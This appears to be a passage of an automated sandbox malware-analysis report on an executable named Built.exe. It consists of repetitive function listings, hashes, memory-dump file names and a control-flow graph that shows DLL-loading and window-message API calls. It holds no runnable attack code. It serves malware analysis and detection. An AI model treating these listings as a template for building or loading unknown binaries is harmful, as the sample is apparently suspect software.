                                                                                                                                                                                                                                                        • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                        • Instruction ID: f822de7420039d662f2b65bbed598f157f1b8d587cc9bb38cb821fbb5a2cc39e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34510972F0822186FF54CF649B616BC3765AB64358F581235FD1EE6ADDDF38A4428700
                                                                                                                                                                                                                                                        Function 00007FF65E29577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                                                        • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                                        • Instruction ID: 98e23e38848354832bbbcd488b7906ac3ba8e3a57d0875d3bc9d917e109051cf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51514A22F086458AFB10CB61E6503BD37A1BB68B58F186439EE49E668DDF3CD4818750
                                                                                                                                                                                                                                                        Function 00007FF65E2820C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1956198572-0
                                                                                                                                                                                                                                                        • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                        • Instruction ID: a795ed73208447fa5404bf791806d1b5ab0409294591b99c6b04a809a5f6f0af
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01110822F0C24282FE54876AF7442B97292EFA8780F9C9030FB4997B8ECD7DD4C18600
                                                                                                                                                                                                                                                        Function 00007FF65E28D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                        • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                        • Instruction ID: 28b6f06fade821fdc35c0197755551096ee78f440e3aeaf9ba1cf3d963f9c2c2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A111C22B54B058AEF008B60EA542A933B4FB69758F480E31EA6D967A8DFB8D1548340
                                                                                                                                                                                                                                                        Function 00007FF65E2A5B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                        • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                                        • Instruction ID: 50074431315e9213d51d17960f48bb7e14178d05f6dcadc29ee860a024b1b92d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15412612A4868242FF249B25E70137B7791EBA0BA4F184239FF9D96ADDDF7CD4818700
                                                                                                                                                                                                                                                        Function 00007FF65E299014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E299046
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A948: RtlFreeHeap.NTDLL(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A95E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A948: GetLastError.KERNEL32(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A968
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF65E28CBA5), ref: 00007FF65E299064
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                        • API String ID: 3580290477-3826869666
                                                                                                                                                                                                                                                        • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                                        • Instruction ID: a8791df8b3d554f41b09206c4ad05fa0940acd410ec050f5bb17308f52197703
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5416932A08B1286EF149F25DB800B977A4FB647E0B5D6035F94EE3B89DE38E4C58300
                                                                                                                                                                                                                                                        Function 00007FF65E29CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                        • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                        • Instruction ID: 42255fbd3d729705f1a2fc472068448a668825cddb6025e61b0b412a80e8fa9a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C41D272B18A4181DB208F25EA453AA77A0FBA8784F485131FE4DE7798EF7CD441CB40
                                                                                                                                                                                                                                                        Function 00007FF65E29F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                        • Opcode ID: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
                                                                                                                                                                                                                                                        • Instruction ID: b06de3966986da1e23a00a28b560b248877f9791e6fbd23f14a5d8a21d3b26d6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F21D262A1C39181FF609B15D24427D73B1FBA8B84F494035EA9DE3698DFBCE984CB41
                                                                                                                                                                                                                                                        Function 00007FF65E28FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                        • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                        • Instruction ID: 1f2f9724976a1de053ebfa66bacaf39a110d45c000bb198927066308da3bc51c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4115E3261CB8582EB218F15EA1025977E5FB98B84F5C4231EB8D57759DF3CC551C700
                                                                                                                                                                                                                                                        Function 00007FF65E2A073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                        • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                        • Instruction ID: 853aa25da386149b73a0321dfcec66a7917eb5f0fafa7951ad475f5efa2f0693
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E018F6291C20786FF20AF60AB6167E33A0EF68744F881436F54DE2689EF7CE5448B15

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FF65E281000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 0 7ff65e281000-7ff65e283806 call 7ff65e28fe18 call 7ff65e28fe20 call 7ff65e28c850 call 7ff65e2953f0 call 7ff65e295484 call 7ff65e2836b0 14 7ff65e283808-7ff65e28380f 0->14 15 7ff65e283814-7ff65e283836 call 7ff65e281950 0->15 16 7ff65e283c97-7ff65e283cb2 call 7ff65e28c550 14->16 20 7ff65e28383c-7ff65e283856 call 7ff65e281c80 15->20 21 7ff65e28391b-7ff65e283931 call 7ff65e2845c0 15->21 25 7ff65e28385b-7ff65e28389b call 7ff65e288830 20->25 28 7ff65e28396a-7ff65e28397f call 7ff65e282710 21->28 29 7ff65e283933-7ff65e283960 call 7ff65e287f90 21->29 34 7ff65e28389d-7ff65e2838a3 25->34 35 7ff65e2838c1-7ff65e2838cc call 7ff65e294f30 25->35 37 7ff65e283c8f 28->37 41 7ff65e283984-7ff65e2839a6 call 7ff65e281c80 29->41 42 7ff65e283962-7ff65e283965 call 7ff65e29004c 29->42 38 7ff65e2838a5-7ff65e2838ad 34->38 39 7ff65e2838af-7ff65e2838bd call 7ff65e2889a0 34->39 49 7ff65e2839fc-7ff65e283a2a call 7ff65e288940 call 7ff65e2889a0 * 3 35->49 50 7ff65e2838d2-7ff65e2838e1 call 7ff65e288830 35->50 37->16 38->39 39->35 52 7ff65e2839b0-7ff65e2839b9 41->52 42->28 76 7ff65e283a2f-7ff65e283a3e call 7ff65e288830 49->76 57 7ff65e2838e7-7ff65e2838ed 50->57 58 7ff65e2839f4-7ff65e2839f7 call 7ff65e294f30 50->58 52->52 56 7ff65e2839bb-7ff65e2839d8 call 7ff65e281950 52->56 56->25 68 7ff65e2839de-7ff65e2839ef call 7ff65e282710 56->68 62 7ff65e2838f0-7ff65e2838fc 57->62 58->49 65 7ff65e283905-7ff65e283908 62->65 66 7ff65e2838fe-7ff65e283903 62->66 65->58 69 7ff65e28390e-7ff65e283916 call 7ff65e294f30 65->69 66->62 66->65 68->37 69->76 79 7ff65e283b45-7ff65e283b53 76->79 80 7ff65e283a44-7ff65e283a47 76->80 81 7ff65e283b59-7ff65e283b5d 79->81 82 7ff65e283a67 79->82 80->79 83 7ff65e283a4d-7ff65e283a50 80->83 84 7ff65e283a6b-7ff65e283a90 call 7ff65e294f30 81->84 82->84 85 7ff65e283a56-7ff65e283a5a 83->85 86 7ff65e283b14-7ff65e283b17 83->86 94 7ff65e283aab-7ff65e283ac0 84->94 95 7ff65e283a92-7ff65e283aa6 call 7ff65e288940 84->95 85->86 88 7ff65e283a60 85->88 89 7ff65e283b19-7ff65e283b1d 86->89 90 7ff65e283b2f-7ff65e283b40 call 7ff65e282710 86->90 88->82 89->90 93 7ff65e283b1f-7ff65e283b2a 89->93 98 7ff65e283c7f-7ff65e283c87 90->98 93->84 99 7ff65e283be8-7ff65e283bfa call 7ff65e288830 94->99 100 7ff65e283ac6-7ff65e283aca 94->100 95->94 98->37 108 7ff65e283bfc-7ff65e283c02 99->108 109 7ff65e283c2e 99->109 102 7ff65e283bcd-7ff65e283be2 call 7ff65e281940 100->102 103 7ff65e283ad0-7ff65e283ae8 call 7ff65e295250 100->103 102->99 102->100 111 7ff65e283aea-7ff65e283b02 call 7ff65e295250 103->111 112 7ff65e283b62-7ff65e283b7a call 7ff65e295250 103->112 113 7ff65e283c04-7ff65e283c1c 108->113 114 7ff65e283c1e-7ff65e283c2c 108->114 115 7ff65e283c31-7ff65e283c40 call 7ff65e294f30 109->115 111->102 124 7ff65e283b08-7ff65e283b0f 111->124 122 7ff65e283b7c-7ff65e283b80 112->122 123 7ff65e283b87-7ff65e283b9f call 7ff65e295250 112->123 113->115 114->115 125 7ff65e283c46-7ff65e283c4a 115->125 126 7ff65e283d41-7ff65e283d63 call 7ff65e2844e0 115->126 122->123 139 7ff65e283bac-7ff65e283bc4 call 7ff65e295250 123->139 140 7ff65e283ba1-7ff65e283ba5 123->140 124->102 129 7ff65e283cd4-7ff65e283ce6 call 7ff65e288830 125->129 130 7ff65e283c50-7ff65e283c5f call 7ff65e2890e0 125->130 136 7ff65e283d65-7ff65e283d6f call 7ff65e284630 126->136 137 7ff65e283d71-7ff65e283d82 call 7ff65e281c80 126->137 141 7ff65e283ce8-7ff65e283ceb 129->141 142 7ff65e283d35-7ff65e283d3c 129->142 143 7ff65e283cb3-7ff65e283cbd call 7ff65e288660 130->143 144 7ff65e283c61 130->144 151 7ff65e283d87-7ff65e283d96 136->151 137->151 139->102 154 7ff65e283bc6 139->154 140->139 141->142 150 7ff65e283ced-7ff65e283d10 call 7ff65e281c80 141->150 148 7ff65e283c68 call 7ff65e282710 142->148 164 7ff65e283cc8-7ff65e283ccf 143->164 165 7ff65e283cbf-7ff65e283cc6 143->165 144->148 160 7ff65e283c6d-7ff65e283c77 148->160 166 7ff65e283d2b-7ff65e283d33 call 7ff65e294f30 150->166 167 7ff65e283d12-7ff65e283d26 call 7ff65e282710 call 7ff65e294f30 150->167 157 7ff65e283d98-7ff65e283d9f 151->157 158 7ff65e283dc4-7ff65e283dda call 7ff65e289390 151->158 154->102 157->158 162 7ff65e283da1-7ff65e283da5 157->162 172 7ff65e283ddc 158->172 173 7ff65e283de8-7ff65e283e04 SetDllDirectoryW 158->173 160->98 162->158 168 7ff65e283da7-7ff65e283dbe SetDllDirectoryW LoadLibraryExW 162->168 164->151 165->148 166->151 167->160 168->158 172->173 174 7ff65e283e0a-7ff65e283e19 call 7ff65e288830 173->174 175 7ff65e283f01-7ff65e283f08 173->175 188 7ff65e283e1b-7ff65e283e21 174->188 189 7ff65e283e32-7ff65e283e3c call 7ff65e294f30 174->189 180 7ff65e284008-7ff65e284010 175->180 181 7ff65e283f0e-7ff65e283f15 175->181 182 7ff65e284035-7ff65e284040 call 7ff65e2836a0 call 7ff65e283360 180->182 183 7ff65e284012-7ff65e28402f PostMessageW GetMessageW 180->183 181->180 186 7ff65e283f1b-7ff65e283f25 call 7ff65e2833c0 181->186 200 7ff65e284045-7ff65e284067 call 7ff65e283670 call 7ff65e286fc0 call 7ff65e286d70 182->200 183->182 186->160 196 7ff65e283f2b-7ff65e283f3f call 7ff65e2890c0 186->196 193 7ff65e283e2d-7ff65e283e2f 188->193 194 7ff65e283e23-7ff65e283e2b 188->194 201 7ff65e283ef2-7ff65e283efc call 7ff65e288940 189->201 202 7ff65e283e42-7ff65e283e48 189->202 193->189 194->193 207 7ff65e283f64-7ff65e283fa7 call 7ff65e288940 call 7ff65e2889e0 call 7ff65e286fc0 call 7ff65e286d70 call 7ff65e2888e0 196->207 208 7ff65e283f41-7ff65e283f5e PostMessageW GetMessageW 196->208 201->175 202->201 206 7ff65e283e4e-7ff65e283e54 202->206 210 7ff65e283e56-7ff65e283e58 206->210 211 7ff65e283e5f-7ff65e283e61 206->211 247 7ff65e283fa9-7ff65e283fbf call 7ff65e288ed0 call 7ff65e2888e0 207->247 248 7ff65e283ff5-7ff65e284003 call 7ff65e281900 207->248 208->207 212 7ff65e283e67-7ff65e283e83 call 7ff65e286dc0 call 7ff65e287340 210->212 215 7ff65e283e5a 210->215 211->175 211->212 227 7ff65e283e85-7ff65e283e8c 212->227 228 7ff65e283e8e-7ff65e283e95 212->228 215->175 232 7ff65e283edb-7ff65e283ef0 call 7ff65e282a50 call 7ff65e286fc0 call 7ff65e286d70 227->232 230 7ff65e283e97-7ff65e283ea4 call 7ff65e286e00 228->230 231 7ff65e283eaf-7ff65e283eb9 call 7ff65e2871b0 228->231 230->231 243 7ff65e283ea6-7ff65e283ead 230->243 245 7ff65e283ebb-7ff65e283ec2 231->245 246 7ff65e283ec4-7ff65e283ed2 call 7ff65e2874f0 231->246 232->175 243->232 245->232 246->175 256 7ff65e283ed4 246->256 247->248 261 7ff65e283fc1-7ff65e283fd6 247->261 248->160 256->232 262 7ff65e283fd8-7ff65e283feb call 7ff65e282710 call 7ff65e281900 261->262 263 7ff65e283ff0 call 7ff65e282a50 261->263 262->160 263->248
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
